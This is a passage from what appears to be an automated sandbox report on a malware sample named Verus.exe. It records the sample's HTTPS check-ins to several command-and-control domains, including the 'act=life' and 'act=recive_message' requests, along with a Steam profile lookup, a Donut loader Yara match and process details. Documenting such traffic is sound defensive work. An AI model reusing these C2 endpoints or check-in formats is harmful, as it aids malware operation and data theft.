2024-10-14 07:41:21 UTC	811	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k292g8o45bptgahjpc4mv47mug; expires=Fri, 07 Feb 2025 01:28:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=68a2nUqcztB1T6fTMDQXHsj2wmeMSB9ICJzmSld48eI6OSuMZdLYhapPXx7bEeudENeNguMERDxp8QtYUQQrmy8zA1QbGIoq3zaz73MKvZuZCOUpLaHYA8%2B5GrB9xXJN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed3199000f70-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:21 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	172.67.205.156	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:22 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resinedyw.sbs
2024-10-14 07:41:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:22 UTC	815	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=47rs8kpm0d0862alb37e9kj47c; expires=Fri, 07 Feb 2025 01:28:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ESnnvuemmRUPCtTiS157w6B9sUBaY73ndQK1XdvZtkTiaN%2BWJzu1DdUNmy45ecrgTqZfr5Dl11oWj5zy1l2C%2FhJOn4OAXISw0MhtY4kxfovX8xrjU9f0swp%2BFGyO2FvO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed37babcc351-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:22 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	172.67.140.193	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:23 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vennurviot.sbs
2024-10-14 07:41:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:23 UTC	823	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p2nom767f2l7vib9ip9t7j32tc; expires=Fri, 07 Feb 2025 01:28:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xoJfnqNkkzFco5r16Xz2GOSwbjeoq7McakTVb%2F9IVpV%2FBe5jticWiKYc0P5OlRkHcpACoHHqKK4IV0L9C0rzlSNx%2FWim3Cy1ZndTNtSgwL3Tibh9xhx66bFxq2Pp1andJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed3dea0b330c-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	172.67.173.224	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:24 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ehticsprocw.sbs
2024-10-14 07:41:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:24 UTC	817	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=65uinnra616r71ubog2qpu3ie0; expires=Fri, 07 Feb 2025 01:28:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jNbrV5Jehi7t4dFs2m4VrhZdnldj9T93mHeWmwyAw41bdBoRDJnuaQuAPNSKBUlaJqoNWCS0Xf3Hxju5jICX7FUYSVHwMiyNKxmxTW%2BO4r0S1yz62gPnN06qWT7cqIatkrk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed43aaec4382-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:24 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	172.67.141.136	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:25 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condifendteu.sbs
2024-10-14 07:41:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:25 UTC	817	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=654qsm8pen2nsnif16h18609j9; expires=Fri, 07 Feb 2025 01:28:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yQkuiHCi2SpK0B1pJKi6j92mK9DGMqsBN433EP9L5r9vkY6PAovS5M5wriRBEwaytq9j2x%2FKdWaW45xZ7Gn7pmL92AN6Vqx8YJsKVDz2uBIy2xkJI1IdFeXKC%2BGdf6BjQivQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed49be0ec411-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:25 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	188.114.97.3	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:26 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawwyobstacw.sbs
2024-10-14 07:41:26 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:26 UTC	835	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c0qlr4p14n6atkmeaqlm4ldtc4; expires=Fri, 07 Feb 2025 01:28:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2y%2BIQZ70sfKoAR3%2B%2B20S3N8S%2BQ2lYwgaBdOz245jzzXAwdmezPKLrdF9rHQsIAH%2BESHcZPZPpnI3pyyQxbDRRTjROKHYAF%2F%2BGx3hjtfbey0li8IIz57UtVaMRDVlTn52A5ZkIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed4fa9f0728d-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:26 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	104.102.49.254	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:27 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-14 07:41:28 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 14 Oct 2024 07:41:27 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=489b4d2f003ffa079ae1716b; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-14 07:41:28 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-14 07:41:28 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-14 07:41:28 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-14 07:41:28 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	104.21.53.8	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:28 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-14 07:41:28 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 07:41:28 UTC	553	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i92aE8ZKRfp90cKFFlXHH3RAzlpoQtDDedwuyRLs5XYlCQNEItXl7ywNAxD0uJZx%2FqppxNOgaDD5%2FhffARXkcUq%2FfTE1FQ5ur4REwvnx4NE4K0B6LLqtLANbu4tEdSv4WtY7BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed5e9de98c6b-EWR
2024-10-14 07:41:28 UTC	816	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-14 07:41:28 UTC	1369	IN	Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-10-14 07:41:28 UTC	1369	IN	Data Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
2024-10-14 07:41:28 UTC	887	IN	Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
2024-10-14 07:41:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	104.21.53.8	443	7416	C:\Users\user\Desktop\Verus.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 07:41:29 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=GuC2Zbqa.VDQ6OeaRKUXKu9e65jd8FQJg5PAo5ZMINA-1728891688-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: sergei-esenin.com
2024-10-14 07:41:29 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--1816906785&j=
2024-10-14 07:41:29 UTC	831	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 07:41:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rr82kld1nf3me94sp1h82kbh0c; expires=Fri, 07 Feb 2025 01:28:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7bxU4Bxv7I%2BL2HuiC3niF5qzaYKETwoC5JH8HKcZENEIm%2Fd%2FDSnrg4FVBipMbXrO1rqf6i0jYX68MtNlSSCQvtJeh1KnTtMBpmPAR9Ivv7FqjjXiD6zHEp%2Fg6HZF58l%2BYDAaQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d25ed62f9bf0c7a-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 07:41:29 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 07:41:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:41:02
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\Verus.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Verus.exe"
Imagebase:	0x400000
File size:	2'394'152 bytes
MD5 hash:	9639830D1A300D2E4C409C5809374039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:41:29
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 1812
Imagebase:	0x520000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	51.3%
Signature Coverage:	40%
Total number of Nodes:	115
Total number of Limit Nodes:	16

Executed Functions

Function 00BA9AF1 Relevance: 11.2, APIs: 7, Instructions: 742memorynativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00BA9BB1
NtMapViewOfSection.NTDLL(?,00000000), ref: 00BA9C5D
